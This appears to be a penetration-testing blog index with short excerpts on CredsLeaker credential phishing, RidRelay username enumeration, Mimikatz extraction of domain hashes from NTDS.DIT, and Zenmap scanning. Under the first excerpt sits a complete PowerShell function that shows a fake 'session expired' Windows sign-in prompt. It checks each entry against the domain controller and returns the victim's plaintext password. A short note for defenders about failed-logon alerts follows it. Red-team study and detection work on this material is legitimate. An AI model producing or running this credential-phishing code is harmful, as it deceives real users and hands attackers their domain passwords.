Phish domain user credentials with CredsLeaker in PowerShell

CredsLeaker is a PowerShell script that phishes credentials from the logged-on user. It pops up a Windows authentication dialog and checks whatever is typed against the domain controller, re-prompting until it has a valid username and password. This dialog is common in a domain environment, so the user has most likely seen it before and is unlikely to question it. Once CredsLeaker …
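The mechanism the excerpt describes, as an added example that is not CredsLeaker's own code: a prompt that looks like the standard Windows sign-in dialog, with each entry validated against the domain before the prompt is dismissed. It assumes the host is domain-joined and can reach a domain controller; the function names and the dialog message are this example's own choices.

```powershell
# Added example (not from CredsLeaker): prompt, validate against the DC, repeat until valid.
# Assumes a domain-joined host that can reach a domain controller.
Add-Type -AssemblyName System.DirectoryServices.AccountManagement

function Test-DomainCredential {
    param(
        [Parameter(Mandatory)][string]$UserName,
        [Parameter(Mandatory)][string]$Password,
        [string]$Domain = $env:USERDNSDOMAIN
    )
    # ValidateCredentials binds to a DC with the supplied password. A wrong
    # guess shows up on the DC as a failed logon (4776 / 4625), so a user who
    # fumbles the prompt generates a burst of failures from one workstation.
    $ctx = New-Object System.DirectoryServices.AccountManagement.PrincipalContext(
        [System.DirectoryServices.AccountManagement.ContextType]::Domain, $Domain)
    try {
        return $ctx.ValidateCredentials($UserName, $Password)
    } finally {
        $ctx.Dispose()
    }
}

function Invoke-CredentialPrompt {
    param([int]$MaxAttempts = 3)
    for ($i = 1; $i -le $MaxAttempts; $i++) {
        # In Windows PowerShell 5.1 Get-Credential shows the same GUI dialog users
        # see for mapped drives and Outlook, which is what makes the prompt believable.
        # (PowerShell 7 renders it in the console instead.)
        $cred = Get-Credential -UserName "$env:USERDOMAIN\$env:USERNAME" `
                               -Message "Your session has expired. Please sign in again."
        if ($null -eq $cred) { return $null }   # user pressed Cancel

        $net    = $cred.GetNetworkCredential()   # splits DOMAIN\user into Domain/UserName
        $domain = if ($net.Domain) { $net.Domain } else { $env:USERDNSDOMAIN }

        if (Test-DomainCredential -UserName $net.UserName -Password $net.Password -Domain $domain) {
            return [pscustomobject]@{ User = "$domain\$($net.UserName)"; Password = $net.Password }
        }
        # Wrong password: fall through and ask again, as the script in the post does.
    }
    return $null
}

# Usage: $leaked = Invoke-CredentialPrompt
```

Two details matter for defenders: the prompt appears with no parent application asking for it, and every wrong entry becomes a failed domain logon from the same host within seconds, which is a cheap thing to alert on.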

Enumerate usernames on a domain with no permissions

RidRelay is a Python script that enumerates domain usernames when you have no permissions on the domain at all. It is a quick and easy way to get a list of domain users while on an internal network. RidRelay combines an SMB relay attack, common lsarpc queries and RID cycling to build that list. It …

Retrieve domain password hashes with Mimikatz

Mimikatz is a Windows security tool that can extract passwords and password hashes from Windows workstations and servers. One way of doing this manually is to pull them from NTDS.DIT, the Active Directory database. That file is tricky to copy, because it is held open and locked while the domain controller is running. This …

Scanning networks with Zenmap (nmap GUI)

One of the most useful tools included in Kali Linux is Zenmap, a front-end UI for nmap. It lets you see scan results visually and run further tasks against hosts without knowing nmap's command-line options. Although installed in Kali by default, Zenmap can easily be installed on any Linux distribution. Zenmap …